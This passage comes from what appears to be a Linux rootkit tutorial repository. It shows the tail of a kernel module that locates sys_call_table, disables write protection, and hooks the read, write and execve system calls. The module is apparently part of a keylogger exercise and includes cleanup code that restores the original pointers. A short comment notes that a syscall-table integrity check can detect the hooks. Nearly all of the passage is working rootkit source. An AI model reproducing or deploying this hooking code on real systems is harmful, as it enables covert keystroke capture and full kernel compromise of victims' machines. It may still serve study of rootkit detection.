%s\n" , Message); 242 | // memset (Message , 0 , sizeof(Message)); 243 | 244 | } 245 | 246 | 247 | return (*original_write)(fd, buffer , nbytes); 248 | 249 | } 250 | 251 | 252 | 253 | 254 | static int __init SetHooks(void) { 255 | // Gets Syscall Table ** 256 | SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table"); 257 | 258 | printk(KERN_INFO "Hooks Will Be Set.\n"); 259 | printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE); 260 | 261 | 262 | EnablePageWriting(); 263 | 264 | // Replaces Pointer Of Syscall_read on our syscall. 265 | 266 | 267 | 268 | // KEEP THIS ORDER!!! 
269 | // CRASH WILL HAPPEN 270 | original_read = (void*)SYS_CALL_TABLE[__NR_read]; 271 | SYS_CALL_TABLE[__NR_read] = (unsigned long*)HookRead; 272 | 273 | original_write = (void*)SYS_CALL_TABLE[__NR_write]; 274 | SYS_CALL_TABLE[__NR_write] = (unsigned long*)HookWrite; 275 | 276 | origional_execve = (void*)SYS_CALL_TABLE[__NR_execve]; 277 | SYS_CALL_TABLE[__NR_execve] = (unsigned long*)HookExecve; 278 | 279 | DisablePageWriting(); 280 | 281 | return 0; 282 | } 283 | 284 | 285 | // HookCleanup: module exit. Inside an EnablePageWriting()/DisablePageWriting() pair it writes the saved original_read, original_write and origional_execve pointers back into sys_call_table, then logs "HooksCleaned Up!". 286 | // Detection: until this runs, the read, write and execve slots point into module memory rather than kernel text, which a syscall-table integrity check can flag. 287 | 288 | 289 | 290 | static void __exit HookCleanup(void) { 291 | 292 | // Clean up our Hooks 293 | EnablePageWriting(); 294 | SYS_CALL_TABLE[__NR_read] = (unsigned long*)original_read; 295 | SYS_CALL_TABLE[__NR_write] = (unsigned long*)original_write; 296 | SYS_CALL_TABLE[__NR_execve] = (unsigned long*)origional_execve; 297 | DisablePageWriting(); 298 | 299 | printk(KERN_INFO "HooksCleaned Up!"); 300 | } 301 | 302 | module_init(SetHooks); 303 | module_exit(HookCleanup); -------------------------------------------------------------------------------- /module13_Hooking_SyscallRead_Keylogger/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module12_Hooking_SyscallRead_Keylogger/main.o-.text-359 2 | /home/krash/works/rootkitdev/module12_Hooking_SyscallRead_Keylogger/main.o-.text-369 3 | /home/krash/works/rootkitdev/module12_Hooking_SyscallRead_Keylogger/main.o-.text-389 4 | /home/krash/works/rootkitdev/module12_Hooking_SyscallRead_Keylogger/main.o-.text-399 5 | --------------------------------------------------------------------------------